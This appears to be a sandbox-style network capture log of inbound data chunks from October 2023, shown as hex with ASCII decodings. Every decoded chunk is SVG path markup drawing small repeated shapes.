                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3921INData Raw: 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e
                                                                                                                                                                                                                                                        Data Ascii: 1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3937INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                        Data Ascii: <path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.6
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4146INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4162INData Raw: 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4178INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4194INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4210INData Raw: 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39
                                                                                                                                                                                                                                                        Data Ascii: 7,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4226INData Raw: 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: .87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4242INData Raw: 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33
                                                                                                                                                                                                                                                        Data Ascii: ,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4258INData Raw: 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                        Data Ascii: .93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><pa
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4274INData Raw: 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 35 2e 31 31 2c 32 34 39 2e 37 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.18,3.32"/><path class="cls-9" d="M325.11,249.73a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4290INData Raw: 22 20 64 3d 22 4d 33 35 39 2e 35 37 2c 32 39 37 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: " d="M359.57,297.08a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4306INData Raw: 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 37 37 2c 33 33 36 2e 33 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c
                                                                                                                                                                                                                                                        Data Ascii: .6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M393.77,336.36a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4322INData Raw: 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f
                                                                                                                                                                                                                                                        Data Ascii: 2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4338INData Raw: 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 35 37 2c 31 39 37 2e 30 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: .05,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M446.57,197.09a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4354INData Raw: 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 37 36 2c 32 33 36 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c
                                                                                                                                                                                                                                                        Data Ascii: .59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M480.76,236.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4370INData Raw: 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls
